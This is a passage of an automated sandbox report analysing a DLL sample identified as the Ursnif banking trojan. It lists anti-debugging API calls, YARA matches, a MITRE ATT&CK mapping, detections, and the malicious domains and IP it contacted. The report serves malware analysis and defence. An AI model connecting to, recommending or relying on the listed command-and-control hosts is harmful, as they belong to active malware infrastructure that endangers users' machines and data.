                      Source: regsvr32.exe, 00000002.00000003.845301317.0000000002F4A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWp{
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736D9FB8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_736D9FB8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736DBD8C GetProcessHeap,0_2_736DBD8C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736D6AD0 mov eax, dword ptr fs:[00000030h]0_2_736D6AD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736D9F85 mov eax, dword ptr fs:[00000030h]0_2_736D9F85
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736D6620 mov eax, dword ptr fs:[00000030h]0_2_736D6620
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736D8DCB mov eax, dword ptr fs:[00000030h]0_2_736D8DCB
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_736D6AD0 mov eax, dword ptr fs:[00000030h]2_2_736D6AD0
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_736D9F85 mov eax, dword ptr fs:[00000030h]2_2_736D9F85
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_736D6620 mov eax, dword ptr fs:[00000030h]2_2_736D6620
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_736D8DCB mov eax, dword ptr fs:[00000030h]2_2_736D8DCB
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736D7214 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_736D7214
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736D76ED IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_736D76ED
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_736D9FB8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_736D9FB8
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_736D7214 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_736D7214
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_736D76ED IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_736D76ED

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: avolebukoneh.website
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.9.20.245 187
                      Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: technoshoper.com
                      Source: loaddll32.exe, 00000000.00000002.880973456.0000000001D00000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.881091593.0000000003530000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.881548512.0000000002F00000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.881470565.0000000003290000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.880973456.0000000001D00000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.881091593.0000000003530000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.881548512.0000000002F00000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.881470565.0000000003290000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.880973456.0000000001D00000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.881091593.0000000003530000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.881548512.0000000002F00000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.881470565.0000000003290000.00000002.00020000.sdmpBinary or memory string: &Program Manager
                      Source: loaddll32.exe, 00000000.00000002.880973456.0000000001D00000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.881091593.0000000003530000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.881548512.0000000002F00000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.881470565.0000000003290000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736D78D7 cpuid 0_2_736D78D7
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736D7336 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_736D7336
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00A87648 GetVersion,GetLastError,0_2_00A87648
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00A89DE1 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,0_2_00A89DE1

                      Stealing of Sensitive Information:

                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.620285363.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.613014620.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612932234.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.658506384.000000000507D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612953290.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620302187.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612852123.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701957231.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.746687116.000000000186D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.768852725.000000000176F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.686987362.000000000503F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701777888.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.702038882.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.724522780.000000000196B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.636697378.000000000517B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.681026277.0000000004F7F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620184852.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613707607.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701868957.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612982412.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613851431.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613762692.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6980, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 7000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7012, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7052, type: MEMORYSTR
                      Source: Yara matchFile source: 5.2.rundll32.exe.2b80000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.920000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.a60000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.a80000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.4ea94a0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.9f0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.2bb0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.12994a0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.b40000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.a60000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.4ea94a0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.9e0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.49a94a0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.a40000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.2b80000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.990000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.a50000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.870000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.d80000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.9f0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4d494a0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4d494a0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.49a94a0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.880000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.12994a0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.2b70000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.a90000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.920000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.883888908.0000000004D49000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.879831053.0000000000A50000.00000004.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.879772547.0000000000A40000.00000004.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.884087885.00000000049A9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.881330354.0000000004EA9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.879852238.0000000000B40000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.880442482.0000000001299000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.878853677.0000000000870000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.879036722.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.878927946.0000000000880000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.879010768.00000000009E0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.879009895.0000000000920000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.880994352.0000000002B70000.00000004.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.878979369.0000000000990000.00000004.00000001.sdmp, type: MEMORY

                      Remote Access Functionality:

                      Yara detected Ursnif

                      Mitre Att&ck Matrix

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts | Windows Management Instrumentation 2 | DLL Side-Loading 1 | DLL Side-Loading 1 | Deobfuscate/Decode Files or Information 1 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact 1
                      Default Accounts | Native API 1 | Boot or Logon Initialization Scripts | Process Injection 112 | Obfuscated Files or Information 3 | LSASS Memory | Account Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Encrypted Channel 21 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Software Packing 2 | Security Account Manager | File and Directory Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | DLL Side-Loading 1 | NTDS | System Information Discovery 14 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 3 | SIM Card Swap | | Carrier Billing Fraud
                      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading 1 | LSA Secrets | Security Software Discovery 21 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion 1 | Cached Domain Credentials | Virtualization/Sandbox Evasion 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                      External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection 112 | DCSync | Process Discovery 2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Regsvr32 1 | Proc Filesystem | System Owner/User Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                      Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Rundll32 1 | /etc/passwd and /etc/shadow | Remote System Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

                      Behavior Graph

                      Behavior Graph ID: 527046, Sample: WTXuYxax6d.dll, Startdate: 23/11/2021, Architecture: WINDOWS, Score: 96
                      [Behavior graph image not reproduced. Nodes recoverable from the graph text: processes loaddll32.exe, regsvr32.exe, cmd.exe, rundll32.exe and iexplore.exe; DNS/IP entries technoshoper.com (45.9.20.245, 443, 49881, 49882, DEDIPATH-LLCUS, Russian Federation), avolebukoneh.website, btloader.com (104.26.7.139, 443, 49821, 49823, CLOUDFLARENETUS, United States), www.msn.com and 192.168.2.1.]


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      Source | Detection | Scanner | Label
                      WTXuYxax6d.dll | 18% | Virustotal |
                      WTXuYxax6d.dll | 25% | ReversingLabs | Win32.Trojan.Generic

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      Source | Detection | Scanner | Label
                      3.2.rundll32.exe.a60000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
                      2.2.regsvr32.exe.9f0000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
                      5.2.rundll32.exe.2bb0000.3.unpack | 100% | Avira | HEUR/AGEN.1108168
                      0.2.loaddll32.exe.a80000.3.unpack | 100% | Avira | HEUR/AGEN.1108168
                      2.2.regsvr32.exe.d80000.3.unpack | 100% | Avira | HEUR/AGEN.1108168
                      0.2.loaddll32.exe.920000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
                      3.2.rundll32.exe.a90000.3.unpack | 100% | Avira | HEUR/AGEN.1108168

                      Domains

                      Source | Detection | Scanner | Label
                      technoshoper.com | 6% | Virustotal |
                      btloader.com | 1% | Virustotal |
                      avolebukoneh.website | 6% | Virustotal |

                      URLs


                      Domains and IPs

                      Contacted Domains

                      Name                      IP             Active    Malicious   Antivirus Detection   Reputation
                      contextual.media.net      2.18.160.23    true      false                             high
                      hblg.media.net            2.18.160.23    true      false                             high
                      lg3.media.net             2.18.160.23    true      false                             high
                      technoshoper.com          45.9.20.245    true      true                              unknown
                      btloader.com              104.26.7.139   true      false                             unknown
                      avolebukoneh.website      unknown        unknown   true                              unknown
                      assets.msn.com            unknown        unknown   false                             high
                      web.vortex.data.msn.com   unknown        unknown   false                             high
                      www.msn.com               unknown        unknown   false                             high
                      cvision.media.net         unknown        unknown   false                             high

                      Contacted URLs

                      Name                                                     Malicious   Antivirus Detection    Reputation
                      https://btloader.com/tag?o=6208086025961472&upapi=true   false       URL Reputation: safe   unknown

                      URLs from Memory and Binaries

                                                                                                                                                                  high
                                                                                                                                                                  https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.jsoniab2Data[1].json.6.drfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  https://cdn.cookielaw.org/vendorlist/iabData.json55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata&quot;de-ch[1].htm.6.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://docs.microsoft.corundll32.exe, 00000005.00000003.726877023.0000000005896000.00000004.00000001.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://onedrive.live.com/?qt=mru;Aktuelle52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://www.msn.com/de-ch/?ocid=iehp{5EF2C13E-4C8E-11EC-90E5-ECF4BB2D2496}.dat.4.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-shoppingstripe-navde-ch[1].htm.6.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://www.ebay.ch/?mkcid=1&amp;mkrid=5222-53480-19255-0&amp;siteid=193&amp;campid=5338626668&amp;tde-ch[1].htm.6.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://www.msn.com/de-ch/homepage/api/modules/fetch&quot;de-ch[1].htm.6.drfalse
                                                                                                                                                                                high

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
104.26.7.139 | btloader.com | United States | 13335 | CLOUDFLARENETUS | false
45.9.20.245 | technoshoper.com | Russian Federation | 35913 | DEDIPATH-LLCUS | true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 527046
Start date: 23.11.2021
Start time: 10:50:29
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 13s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: WTXuYxax6d.dll
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 29
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal96.troj.evad.winDLL@17/114@45/3
EGA Information: Failed
HDC Information:
• Successful, ratio: 64.5% (good quality ratio 60.5%)
• Quality average: 79.3%
• Quality standard deviation: 29.7%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 134
• Number of non-executed functions: 137
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .dll
• Override analysis time to 240s for rundll32
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.203.70.208, 131.253.33.203, 131.253.33.200, 13.107.22.200, 80.67.82.240, 80.67.82.209, 65.55.44.109, 23.11.206.43, 23.11.206.17, 23.11.206.74, 2.18.160.23, 152.199.19.161, 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179, 23.211.5.92
• Excluded domains from analysis (whitelisted): e13678.dscb.akamaiedge.net, store-images.s-microsoft.com-c.edgekey.net, a-0003.dc-msedge.net, arc.msn.com, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, e12564.dspb.akamaiedge.net, www.microsoft.com-c-3.edgekey.net, go.microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, client.wns.windows.com, fs.microsoft.com, ie9comview.vo.msecnd.net, cvision.media.net.edgekey.net, www-msn-com.a-0003.a-msedge.net, a1999.dscg2.akamai.net, web.vortex.data.trafficmanager.net, e607.d.akamaiedge.net, web.vortex.data.microsoft.com, ris.api.iris.microsoft.com, dual-a-0001.dc-msedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, icePrime.a-0003.dc-msedge.net, go.microsoft.com.edgekey.net, static-global-s-msn-com.akamaized.net, microsoft.com, www.microsoft.com, cs9.wpc.v0cdn.net
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time | Type | Description
10:53:19 | API Interceptor | 13x Sleep call for process: regsvr32.exe modified
10:53:19 | API Interceptor | 26x Sleep call for process: rundll32.exe modified
10:54:14 | API Interceptor | 8x Sleep call for process: loaddll32.exe modified

                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                IPs


                                                                                                                                                                                                                              Domains

                                                                                                                                                                                                                              • 2.18.160.23
                                                                                                                                                                                                                              tebdXHvUhB.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 2.18.160.23
                                                                                                                                                                                                                              619b721d39f71.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 2.18.160.23
                                                                                                                                                                                                                              619b721d39f71.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 2.18.160.23
                                                                                                                                                                                                                              0MGLPJiSa5.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 2.18.160.23
                                                                                                                                                                                                                              0MGLPJiSa5.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 2.18.160.23
                                                                                                                                                                                                                              malware.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 2.18.160.23
                                                                                                                                                                                                                              kZ45hWt9ul.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 2.18.160.23
                                                                                                                                                                                                                              wMidyLtyIL.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 23.211.6.95
                                                                                                                                                                                                                              wMidyLtyIL.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 23.211.6.95
                                                                                                                                                                                                                              loveTubeLike.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.76.200.23
                                                                                                                                                                                                                              Fuutbqvhmc.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 23.211.6.95
                                                                                                                                                                                                                              hblg.media.netV6oWh8Z20j.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 23.211.6.95
                                                                                                                                                                                                                              V6oWh8Z20j.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 23.211.6.95
                                                                                                                                                                                                                              481DGzXveG.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 23.211.6.95
                                                                                                                                                                                                                              Qf3znUYo2b.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 23.211.6.95
                                                                                                                                                                                                                              481DGzXveG.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 23.211.6.95
                                                                                                                                                                                                                              Qf3znUYo2b.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 23.211.6.95
                                                                                                                                                                                                                              DAImS4qg20.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 2.18.160.23
                                                                                                                                                                                                                              2W6FcgEeMy.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 2.18.160.23
                                                                                                                                                                                                                              2zTgaLRFkL.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 2.18.160.23
                                                                                                                                                                                                                              619b721d39f71.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 2.18.160.23
                                                                                                                                                                                                                              619b721d39f71.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 2.18.160.23
                                                                                                                                                                                                                              0MGLPJiSa5.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 2.18.160.23
                                                                                                                                                                                                                              0MGLPJiSa5.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 2.18.160.23
                                                                                                                                                                                                                              malware.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 2.18.160.23
                                                                                                                                                                                                                              kZ45hWt9ul.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 2.18.160.23
                                                                                                                                                                                                                              wMidyLtyIL.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 23.211.6.95
                                                                                                                                                                                                                              wMidyLtyIL.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 23.211.6.95
                                                                                                                                                                                                                              loveTubeLike.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.76.200.23
                                                                                                                                                                                                                              Fuutbqvhmc.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 23.211.6.95
                                                                                                                                                                                                                              data.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 2.18.160.23

ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                                                                                                                                                                              • 23.227.38.74
                                                                                                                                                                                                                              Payment Slip.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 172.67.205.83
                                                                                                                                                                                                                              20002.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.21.62.32
                                                                                                                                                                                                                              FIAA PO-200036452676.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.21.64.38
                                                                                                                                                                                                                              New Orders.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.21.19.200
                                                                                                                                                                                                                              YPJ-76577.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.21.19.200
                                                                                                                                                                                                                              inter snake.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 172.67.188.154
                                                                                                                                                                                                                              0PBOMB3aN9.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.21.88.245
                                                                                                                                                                                                                              VBELHQLOAs.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 162.159.134.233

                                                                                                                                                                                                                              JA3 Fingerprints

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\EQAWN5DV\www.msn[2].xml
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):139
                                                                                                                                                                                                                              Entropy (8bit):5.1927425956439235
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:D9yRtFwsx6wmxvFuqLHIfiAANEJGX7T4mEYldufUXVlNROqSmfRKb:JUFkduqsiAANEIXH4mE8dufEIOwb
                                                                                                                                                                                                                              MD5:97D066790F446B2355842BDC31161621
                                                                                                                                                                                                                              SHA1:79B67BB9C6CAAF003EA680A2A6709433CA6C1B32
